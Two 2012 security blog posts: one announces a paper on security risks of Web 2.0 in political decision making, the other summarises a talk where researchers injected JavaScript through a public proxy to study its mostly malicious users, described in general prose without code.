Friday, August 17, 2012

Raising Risk Awareness on the Adoption of Web 2.0 Technologies in Decision Making Processes

Today I'd like to share a paper that Marco Prandini and I wrote on the use of Web2.0 in decision making process. The paper can be found here on the Journal of Future Internet.

Abstract: In the recent past, the so-called “Web 2.0” became a powerful tool for decision making processes. Politicians and managers, seeking to improve participation, embraced this technology as if it simply were a new, enhanced version of the World Wide Web, better suited to retrieve information, opinions and feedbacks from the general public on subjects like laws, acts and policies. This approach was often naive, neglecting the less-obvious aspects of the technology, and thus bringing on significant security problems. This paper shows how, in the end, the result could easily be the opposite of what was desired. Malicious attackers, in fact, could quite easily exploit the vulnerabilities in these systems to hijack the process and lead to wrong decisions, also causing the public to lose trust in the systems themselves.


Web 2.0 is for sure a great opportunity and an amazing paradigm that could be very useful for politicians or decison makers in the more broad way. However web 2.0, as described in e paper, could be very dangerous if used to attack a decision chain. The paper describes and gives examples on how a possible attacker could attack current political decisions by exploiting simple and well known Web 2.0 bugs. I recommend this reading to all of you involved in politics and/ord decision making, in addition to everybody who works for government agencies.

Tuesday, August 7, 2012

JavaScript and Botnets

After an entire period of time busy in traveling and moving to a new city I am finally back on my blog. Not sure abut the frequency of my future posts but still very interested on keeping on posting my working topic ;). Probably I'll be able to post a little bit more from now... Most of you are already aware about the DevCon 2012 and its new topics on security, so I won't spend time on this discussion, but I do want pointing out an interesting technical paper presented by Chema Alonso and Manu "The Sur" titled :" Owing Bad Guys {& Mafia} with JavaScript Botnets".

The paper describes how attackers, by exploiting TOR networks and public available proxies, can intercept user's traffic, and injecting malicious JavaScript to exploit users' browsers. The technique per-se is well known from years and the framework they used to load malicious payloads (BeeF) is already widely used around the hacking community. So what's so interesting about this paper if it does not introduce any new concept? I found really interesting the analysis on the users they had. in other words who is using public available proxies and TOR networks.

Let's take a deeper view of it. The following image shows the general idea about the implemented attack on a proxy server (BTW they setup a SQUID proxy and the registered it on public proxy registries).

SQUID server has the property to modify traffic following specific roles. Originally these roles have been designed for parent control and for blocking some specific domains, but it can be used under a malicious perspective to inject malicious JavaScript on downloads pages. The authors used a poison script to inject malicious JavaScript. Following the infection:

Again I don't see any interesting technique in this. BUT I do see the beauty of this study in capturing the "stakeholders". If you follow on reading the paper, authors show who used this proxy and what he did with it. Obviously most of the performed operations by exploiting the free (and hacked) proxy were with malicious intents. One of the most interesting proves that authors provided is about Scam and people who answered back by giving personal informations.

Most of the stakeholders come from Ex-URS, Brasil and USA. Many of them from Cina, only few of them from Europe. Beside normal stats on where users come from, understandings how malicious hackers use proxies to attack is really interesting. Another little but significative theoric brick could be added to all the knowledge we had from honey-net project.